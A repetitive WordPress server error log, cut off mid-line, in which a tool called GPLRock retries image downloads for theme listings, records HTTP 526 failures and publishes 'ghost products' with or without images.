leadengine-multi-purpose-wordpress-theme [04-Apr-2026 07:39:39 UTC] GPLRock: Image download failed for product victoria-premium-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:39:41 UTC] GPLRock: Image download failed for product victoria-premium-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:39:43 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/victoria-premium-restaurant-wordpress-theme-18156.webp for product victoria-premium-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:39:43 UTC] GPLRock: Image download failed for product victoria-premium-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:39:45 UTC] GPLRock: Image download failed for product victoria-premium-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:39:47 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/victoria-premium-restaurant-wordpress-theme-18156.webp for product victoria-premium-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:39:47 UTC] GPLRock WARNING: Image download failed for product victoria-premium-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/victoria-premium-restaurant-wordpress-theme-18156.webp [04-Apr-2026 07:39:47 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: victoria-premium-restaurant-wordpress-theme [04-Apr-2026 07:39:48 UTC] GPLRock: Image download failed for product stamp-vibrant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:39:50 UTC] GPLRock: Image download failed for product stamp-vibrant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:39:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stamp---vibrant-wordpress-theme-16004.webp for product stamp-vibrant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:39:52 UTC] GPLRock: Image download failed for product stamp-vibrant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:39:54 UTC] GPLRock: Image download failed for product stamp-vibrant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:39:56 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stamp---vibrant-wordpress-theme-16004.webp for product stamp-vibrant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:39:56 UTC] GPLRock WARNING: Image download failed for product stamp-vibrant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/stamp---vibrant-wordpress-theme-16004.webp [04-Apr-2026 07:39:56 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: stamp-vibrant-wordpress-theme [04-Apr-2026 07:39:56 UTC] GPLRock: Image download failed for product palace-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:39:58 UTC] GPLRock: Image download failed for product palace-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:00 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/palace---real-estate-wordpress-theme-21773.webp for product palace-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:40:01 UTC] GPLRock: Image download failed for product palace-real-estate-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:03 UTC] GPLRock: Image download failed for product palace-real-estate-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/palace---real-estate-wordpress-theme-21773.webp for product palace-real-estate-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:40:05 UTC] GPLRock WARNING: Image download failed for product palace-real-estate-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/palace---real-estate-wordpress-theme-21773.webp [04-Apr-2026 07:40:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: palace-real-estate-wordpress-theme [04-Apr-2026 07:40:05 UTC] GPLRock: Image download failed for product mooblog-kindergarten-blogging-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:07 UTC] GPLRock: Image download failed for product mooblog-kindergarten-blogging-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:09 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mooblog---kindergarten-blogging-wordpress-theme-14498.webp for product mooblog-kindergarten-blogging-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:40:09 UTC] GPLRock: Image download failed for product mooblog-kindergarten-blogging-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:11 UTC] GPLRock: Image download failed for product mooblog-kindergarten-blogging-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mooblog---kindergarten-blogging-wordpress-theme-14498.webp for product mooblog-kindergarten-blogging-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:40:14 UTC] GPLRock WARNING: Image download failed for product mooblog-kindergarten-blogging-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mooblog---kindergarten-blogging-wordpress-theme-14498.webp [04-Apr-2026 07:40:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mooblog-kindergarten-blogging-wordpress-theme [04-Apr-2026 07:40:14 UTC] GPLRock: Image download failed for product smartman-wordpress-theme-for-handyman-service (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:16 UTC] GPLRock: Image download failed for product smartman-wordpress-theme-for-handyman-service (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smartman---wordpress-theme-for-handyman-service-28978.webp for product smartman-wordpress-theme-for-handyman-service after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:40:18 UTC] GPLRock: Image download failed for product smartman-wordpress-theme-for-handyman-service (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:20 UTC] GPLRock: Image download failed for product smartman-wordpress-theme-for-handyman-service (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/smartman---wordpress-theme-for-handyman-service-28978.webp for product smartman-wordpress-theme-for-handyman-service after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:40:22 UTC] GPLRock WARNING: Image download failed for product smartman-wordpress-theme-for-handyman-service. URL: https://meldwp.com/wp-content/uploads/smartman---wordpress-theme-for-handyman-service-28978.webp [04-Apr-2026 07:40:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: smartman-wordpress-theme-for-handyman-service [04-Apr-2026 07:40:23 UTC] GPLRock: Image download failed for product salmon-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:25 UTC] GPLRock: Image download failed for product salmon-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/salmon--restaurant-wordpress-theme-17664.webp for product salmon-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:40:27 UTC] GPLRock: Image download failed for product salmon-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:29 UTC] GPLRock: Image download failed for product salmon-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/salmon--restaurant-wordpress-theme-17664.webp for product salmon-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:40:31 UTC] GPLRock WARNING: Image download failed for product salmon-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/salmon--restaurant-wordpress-theme-17664.webp [04-Apr-2026 07:40:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: salmon-restaurant-wordpress-theme [04-Apr-2026 07:40:31 UTC] GPLRock: Image download failed for product harmuny-creative-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:33 UTC] GPLRock: Image download failed for product harmuny-creative-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/harmuny---creative-blog-wordpress-theme-3120.webp for product harmuny-creative-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:40:36 UTC] GPLRock: Image download failed for product harmuny-creative-blog-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:38 UTC] GPLRock: Image download failed for product harmuny-creative-blog-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/harmuny---creative-blog-wordpress-theme-3120.webp for product harmuny-creative-blog-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:40:40 UTC] GPLRock WARNING: Image download failed for product harmuny-creative-blog-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/harmuny---creative-blog-wordpress-theme-3120.webp [04-Apr-2026 07:40:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: harmuny-creative-blog-wordpress-theme [04-Apr-2026 07:40:40 UTC] GPLRock: Image downloaded successfully for product hongo-modern-multipurpose-woocommerce-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e025f1d1.webp [04-Apr-2026 07:40:40 UTC] GPLRock: Using pre-downloaded image for product hongo-modern-multipurpose-woocommerce-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e025f1d1.webp [04-Apr-2026 07:40:40 UTC] GPLRock: Ghost product published with image - Product ID: hongo-modern-multipurpose-woocommerce-wordpress-theme [04-Apr-2026 07:40:40 UTC] GPLRock: Image download failed for product nakamura-minimal-photography-and-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:42 UTC] GPLRock: Image download failed for product nakamura-minimal-photography-and-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nakamura---minimal-photography-and-portfolio-wordpress-theme-17812.webp for product nakamura-minimal-photography-and-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:40:44 UTC] GPLRock: Image download failed for product nakamura-minimal-photography-and-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:46 UTC] GPLRock: Image download failed for product nakamura-minimal-photography-and-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/nakamura---minimal-photography-and-portfolio-wordpress-theme-17812.webp for product nakamura-minimal-photography-and-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:40:48 UTC] GPLRock WARNING: Image download failed for product nakamura-minimal-photography-and-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/nakamura---minimal-photography-and-portfolio-wordpress-theme-17812.webp [04-Apr-2026 07:40:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: nakamura-minimal-photography-and-portfolio-wordpress-theme [04-Apr-2026 07:40:49 UTC] GPLRock: Image download failed for product stack-clean-responsive-bootstrap-4-admin-dashboard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:51 UTC] GPLRock: Image download failed for product stack-clean-responsive-bootstrap-4-admin-dashboard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stack---clean-responsive-bootstrap-4-admin-dashboard-template-8398.webp for product stack-clean-responsive-bootstrap-4-admin-dashboard-template after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:40:53 UTC] GPLRock: Image download failed for product stack-clean-responsive-bootstrap-4-admin-dashboard-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:55 UTC] GPLRock: Image download failed for product stack-clean-responsive-bootstrap-4-admin-dashboard-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:40:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/stack---clean-responsive-bootstrap-4-admin-dashboard-template-8398.webp for product stack-clean-responsive-bootstrap-4-admin-dashboard-template after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:40:57 UTC] GPLRock WARNING: Image download failed for product stack-clean-responsive-bootstrap-4-admin-dashboard-template. URL: https://meldwp.com/wp-content/uploads/stack---clean-responsive-bootstrap-4-admin-dashboard-template-8398.webp [04-Apr-2026 07:40:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: stack-clean-responsive-bootstrap-4-admin-dashboard-template [04-Apr-2026 07:42:15 UTC] GPLRock: Image download failed for product saashub-digital-product-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:18 UTC] GPLRock: Image download failed for product saashub-digital-product-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saashub---digital-product-wordpress-theme-27240.webp for product saashub-digital-product-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:42:20 UTC] GPLRock: Image download failed for product saashub-digital-product-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:22 UTC] GPLRock: Image download failed for product saashub-digital-product-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/saashub---digital-product-wordpress-theme-27240.webp for product saashub-digital-product-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:42:24 UTC] GPLRock WARNING: Image download failed for product saashub-digital-product-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/saashub---digital-product-wordpress-theme-27240.webp [04-Apr-2026 07:42:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: saashub-digital-product-wordpress-theme [04-Apr-2026 07:42:24 UTC] GPLRock: Image download failed for product honor-shooting-club-weapon-and-gun-store-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:26 UTC] GPLRock: Image download failed for product honor-shooting-club-weapon-and-gun-store-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/honor--shooting-club--weapon-and-gun-store-theme-16632.webp for product honor-shooting-club-weapon-and-gun-store-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:42:29 UTC] GPLRock: Image download failed for product honor-shooting-club-weapon-and-gun-store-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:31 UTC] GPLRock: Image download failed for product honor-shooting-club-weapon-and-gun-store-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/honor--shooting-club--weapon-and-gun-store-theme-16632.webp for product honor-shooting-club-weapon-and-gun-store-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:42:33 UTC] GPLRock WARNING: Image download failed for product honor-shooting-club-weapon-and-gun-store-theme. URL: https://meldwp.com/wp-content/uploads/honor--shooting-club--weapon-and-gun-store-theme-16632.webp [04-Apr-2026 07:42:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: honor-shooting-club-weapon-and-gun-store-theme [04-Apr-2026 07:42:33 UTC] GPLRock: Image download failed for product johansen-creative-niche-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:35 UTC] GPLRock: Image download failed for product johansen-creative-niche-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/johansen---creative-niche-blog-theme-21323.webp for product johansen-creative-niche-blog-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:42:37 UTC] GPLRock: Image download failed for product johansen-creative-niche-blog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:39 UTC] GPLRock: Image download failed for product johansen-creative-niche-blog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/johansen---creative-niche-blog-theme-21323.webp for product johansen-creative-niche-blog-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:42:42 UTC] GPLRock WARNING: Image download failed for product johansen-creative-niche-blog-theme. URL: https://meldwp.com/wp-content/uploads/johansen---creative-niche-blog-theme-21323.webp [04-Apr-2026 07:42:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: johansen-creative-niche-blog-theme [04-Apr-2026 07:42:42 UTC] GPLRock: Image download failed for product flynext-multipurpose-aviation-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:44 UTC] GPLRock: Image download failed for product flynext-multipurpose-aviation-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:46 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flynext---multipurpose-aviation-wordpress-theme--rtl-30737.webp for product flynext-multipurpose-aviation-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:42:46 UTC] GPLRock: Image download failed for product flynext-multipurpose-aviation-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:48 UTC] GPLRock: Image download failed for product flynext-multipurpose-aviation-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/flynext---multipurpose-aviation-wordpress-theme--rtl-30737.webp for product flynext-multipurpose-aviation-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:42:50 UTC] GPLRock WARNING: Image download failed for product flynext-multipurpose-aviation-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/flynext---multipurpose-aviation-wordpress-theme--rtl-30737.webp [04-Apr-2026 07:42:50 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: flynext-multipurpose-aviation-wordpress-theme-rtl [04-Apr-2026 07:42:50 UTC] GPLRock: Image download failed for product healsoul-medical-care-home-healthcare-service-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:53 UTC] GPLRock: Image download failed for product healsoul-medical-care-home-healthcare-service-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:55 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/healsoul---medical-care-home-healthcare-service-wp-theme-13964.webp for product healsoul-medical-care-home-healthcare-service-wp-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:42:55 UTC] GPLRock: Image download failed for product healsoul-medical-care-home-healthcare-service-wp-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:57 UTC] GPLRock: Image download failed for product healsoul-medical-care-home-healthcare-service-wp-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:42:59 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/healsoul---medical-care-home-healthcare-service-wp-theme-13964.webp for product healsoul-medical-care-home-healthcare-service-wp-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:42:59 UTC] GPLRock WARNING: Image download failed for product healsoul-medical-care-home-healthcare-service-wp-theme. URL: https://meldwp.com/wp-content/uploads/healsoul---medical-care-home-healthcare-service-wp-theme-13964.webp [04-Apr-2026 07:42:59 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: healsoul-medical-care-home-healthcare-service-wp-theme [04-Apr-2026 07:42:59 UTC] GPLRock: Image download failed for product ico-crypto-multi-purpose-landing-page-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:01 UTC] GPLRock: Image download failed for product ico-crypto-multi-purpose-landing-page-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:03 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ico-crypto---multi-purpose-landing-page-html-template-28126.webp for product ico-crypto-multi-purpose-landing-page-html-template after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:43:03 UTC] GPLRock: Image download failed for product ico-crypto-multi-purpose-landing-page-html-template (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:05 UTC] GPLRock: Image download failed for product ico-crypto-multi-purpose-landing-page-html-template (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:08 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ico-crypto---multi-purpose-landing-page-html-template-28126.webp for product ico-crypto-multi-purpose-landing-page-html-template after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:43:08 UTC] GPLRock WARNING: Image download failed for product ico-crypto-multi-purpose-landing-page-html-template. URL: https://meldwp.com/wp-content/uploads/ico-crypto---multi-purpose-landing-page-html-template-28126.webp [04-Apr-2026 07:43:08 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ico-crypto-multi-purpose-landing-page-html-template [04-Apr-2026 07:43:08 UTC] GPLRock: Image download failed for product armashop-guns-and-ammo-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:10 UTC] GPLRock: Image download failed for product armashop-guns-and-ammo-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:12 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/armashop---guns-and-ammo-woocommerce-theme-26334.webp for product armashop-guns-and-ammo-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:43:12 UTC] GPLRock: Image download failed for product armashop-guns-and-ammo-woocommerce-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:14 UTC] GPLRock: Image download failed for product armashop-guns-and-ammo-woocommerce-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:16 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/armashop---guns-and-ammo-woocommerce-theme-26334.webp for product armashop-guns-and-ammo-woocommerce-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:43:16 UTC] GPLRock WARNING: Image download failed for product armashop-guns-and-ammo-woocommerce-theme. URL: https://meldwp.com/wp-content/uploads/armashop---guns-and-ammo-woocommerce-theme-26334.webp [04-Apr-2026 07:43:16 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: armashop-guns-and-ammo-woocommerce-theme [04-Apr-2026 07:43:16 UTC] GPLRock: Image download failed for product academie-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:18 UTC] GPLRock: Image download failed for product academie-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:21 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/academie---education-wordpress-theme-30431.webp for product academie-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:43:21 UTC] GPLRock: Image download failed for product academie-education-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:23 UTC] GPLRock: Image download failed for product academie-education-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:25 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/academie---education-wordpress-theme-30431.webp for product academie-education-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:43:25 UTC] GPLRock WARNING: Image download failed for product academie-education-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/academie---education-wordpress-theme-30431.webp [04-Apr-2026 07:43:25 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: academie-education-wordpress-theme [04-Apr-2026 07:43:25 UTC] GPLRock: Image download failed for product amio-minimal-multi-purpose-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:27 UTC] GPLRock: Image download failed for product amio-minimal-multi-purpose-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:29 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amio--minimal-multi-purpose-portfolio-wordpress-theme-23677.webp for product amio-minimal-multi-purpose-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:43:29 UTC] GPLRock: Image download failed for product amio-minimal-multi-purpose-portfolio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:31 UTC] GPLRock: Image download failed for product amio-minimal-multi-purpose-portfolio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/amio--minimal-multi-purpose-portfolio-wordpress-theme-23677.webp for product amio-minimal-multi-purpose-portfolio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:43:33 UTC] GPLRock WARNING: Image download failed for product amio-minimal-multi-purpose-portfolio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/amio--minimal-multi-purpose-portfolio-wordpress-theme-23677.webp [04-Apr-2026 07:43:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: amio-minimal-multi-purpose-portfolio-wordpress-theme [04-Apr-2026 07:43:34 UTC] GPLRock: Image download failed for product primeinvest-finance-and-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:36 UTC] GPLRock: Image download failed for product primeinvest-finance-and-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:38 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/primeinvest---finance-and-consulting-wordpress-theme-21039.webp for product primeinvest-finance-and-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:43:38 UTC] GPLRock: Image download failed for product primeinvest-finance-and-consulting-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:40 UTC] GPLRock: Image download failed for product primeinvest-finance-and-consulting-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [04-Apr-2026 07:43:42 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/primeinvest---finance-and-consulting-wordpress-theme-21039.webp for product primeinvest-finance-and-consulting-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [04-Apr-2026 07:43:42 UTC] GPLRock WARNING: Image download failed for product primeinvest-finance-and-consulting-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/primeinvest---finance-and-consulting-wordpress-theme-21039.webp [04-Apr-2026 07:43:42 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: primeinvest-finance-and-consulting-wordpress-theme [04-Apr-2026 07:43:58 UTC] GPLRock: Image downloaded successfully for product domik-responsive-architecture-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ba56822b.jpg [04-Apr-2026 07:43:58 UTC] GPLRock: Using pre-downloaded image for product domik-responsive-architecture-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ba56822b.jpg [04-Apr-2026 07:43:58 UTC] GPLRock: Ghost product published with image - Product ID: domik-responsive-architecture-wordpress-theme [04-Apr-2026 07:43:59 UTC] GPLRock: Image downloaded successfully for product shortcodes-ultimate-for-amp (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d0a440f6.png [04-Apr-2026 07:43:59 UTC] GPLRock: Using pre-downloaded image for product shortcodes-ultimate-for-amp: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-d0a440f6.png [04-Apr-2026 07:43:59 UTC] GPLRock: Ghost product published with 